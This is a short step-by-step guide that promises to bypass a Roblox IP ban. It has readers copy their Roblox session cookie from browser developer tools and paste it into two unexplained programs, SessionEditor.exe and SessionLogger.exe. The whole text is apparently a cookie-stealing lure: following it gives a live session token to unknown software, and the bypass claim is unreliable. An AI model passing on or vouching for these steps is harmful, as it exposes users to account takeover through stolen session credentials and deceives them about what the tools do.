1. run SessionEditor.exe and in the RBXSessionTracker box input the sessionid.
![ to get a session id, go to https://roblox.com and press ctrl shift i all in the same time, go to the Application tab,
and press Cookies in the left tab. Then select https://www.roblox.com, and you will see RBXSessionTracker in the middle.
Then, you just need to copy the value, and you can close out of developer tools.]
2. select Modification Type as Items, select Modify as build or object (no difference), and then select Update with as Local Server.
3. Press Get output (SHELL) and copy the output from the box below.
4. Close Session Editor, and run SessionLogger.exe.
5. Paste in the Tracker code you copied, and press enter.
6. All done! The IP ban has been bypassed!